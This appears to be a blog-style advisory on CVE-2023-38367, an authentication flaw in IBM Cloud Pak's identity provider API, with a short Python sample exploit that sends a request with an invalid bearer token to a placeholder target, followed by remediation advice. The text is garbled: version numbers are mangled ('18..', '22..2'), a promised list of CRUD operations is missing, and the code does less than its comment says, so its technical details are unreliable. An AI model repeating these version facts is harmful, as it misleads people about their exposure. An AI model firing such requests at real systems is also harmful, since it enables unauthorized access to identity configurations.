CVE-2023-38367 - IBM Cloud Pak Foundational Services Identity Provider (idP) API Unauthenticated CRUD Operations Vulnerability

A security vulnerability has been discovered in IBM Cloud Pak Foundational Services Identity Provider (idP) API that affects versions IBM Cloud Pak for Automation 18.. to 22..2. This vulnerability allows an unauthenticated attacker to perform CRUD operations with an invalid token, thereby allowing them to view, update, delete, or create an IdP configuration. This post will provide an overview of this vulnerability, including details of the exploit and remediation steps.

CVE-ID

CVE-2023-38367

Affected Products

IBM Cloud Pak for Automation 18.., 18..1, 18..2, 19..1, 19..2, 19..3, 20..1, 20..2, 20..3, 21..1, 21..2, 21..3, 22..1, and 22..2.

IBM X-Force ID

261130

Vulnerability Details

The vulnerability exists in the IBM Cloud Pak Foundational Services Identity Provider (idP) API. Due to incorrect validation of access tokens, an attacker can perform the following CRUD (Create, Read, Update, and Delete) operations with an invalid token:

Exploit Details

An attacker can exploit this vulnerability by sending a specially crafted HTTP request with an invalid token to the affected API. The code snippet below demonstrates a sample exploit:

import requests

invalid_token = 'Invalid-Token-Here'
headers = {'Authorization': f'Bearer {invalid_token}'}

# Replace with the target IP address and port
url = 'http://target-ip:port/idp-api/v2/configs';

# Perform CRUD operations
response = requests.get(url, headers=headers)

Once the exploit is successful, the attacker will be able to gain unauthorized access to sensitive information and potentially modify or delete it, leading to a potential security breach.

For more information about this vulnerability and its impact, you can consult the following links

1. IBM Security Advisory
2. National Vulnerability Database (NVD) Entry
3. CVE Details

Remediation

IBM has released patches to address this vulnerability in the affected products. It is recommended that users of IBM Cloud Pak Foundational Services Identity Provider (idP) API update to the latest version to protect against this vulnerability. The list of fixed versions is as follows:

IBM Cloud Pak for Automation 22..3

In addition to applying the patches, it is crucial to follow best security practices, such as reviewing access controls, monitoring access logs, and ensuring proper input validation.

Conclusion

CVE-2023-38367 highlights the importance of ensuring proper access controls and validation for sensitive APIs, particularly in cloud environments. It serves as a reminder to software developers and security professionals to maintain vigilance in protecting user data by following established security protocols and practices. By promptly applying patches and taking the necessary remediation steps, organizations can minimize their exposure to this vulnerability and maintain a secure environment.

Timeline

Published on: 02/29/2024 02:15:09 UTC
Last modified on: 02/29/2024 13:49:29 UTC